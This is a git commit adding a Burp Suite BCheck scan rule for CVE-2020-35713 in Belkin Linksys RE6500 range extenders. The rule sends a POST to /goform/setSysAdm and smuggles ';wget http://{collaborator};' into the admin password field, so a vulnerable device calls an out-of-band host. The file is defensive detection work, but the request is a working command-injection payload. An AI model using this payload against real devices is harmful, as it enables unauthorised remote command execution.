CVE-2020-35713 Linksys RE6500 RCE.

PortSwigger · Aug 31, 2023 · 94967b7 · 94967b7
1 parent f429df9
commit 94967b7
Showing 1 changed file with 31 additions and 0 deletions.
diff --git a/vulnerabilities-CVEd/CVE-2020-35713 - Belkin Linksys RE6500 10012001 - RCE.bcheck b/vulnerabilities-CVEd/CVE-2020-35713 - Belkin Linksys RE6500 10012001 - RCE.bcheck
@@ -0,0 +1,31 @@
+metadata:
+    language: v1-beta
+    name: "CVE-2020-35713 - Belkin Linksys RE6500 <1.0.012.001 - RCE"
+    description: "Checks for CVE-2020-35713"
+    author: "Dolph Flynn"
+    tags: "CVE-2020-35713", "RCE", "belkin", "linksys", "OAST"
+
+
+given host then
+    send request called check:
+        `POST /goform/setSysAdm HTTP/1.1
+         Host: {base.request.url.host}
+         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
+         Connection: close
+         Accept-Encoding: gzip, deflate, br
+         Accept: */*
+         Accept-Language: en-US;q=0.9,en;q=0.8
+         Origin: {base.request.url}
+         Referer: {base.request.url}/login.shtml
+
+         admuser=admin&admpass=;wget http://{generate_collaborator_address()};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1`
+
+    if http interactions then
+
+        report issue:
+            severity: high
+            confidence: tentative
+            detail: "Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution."
+    end if
+
+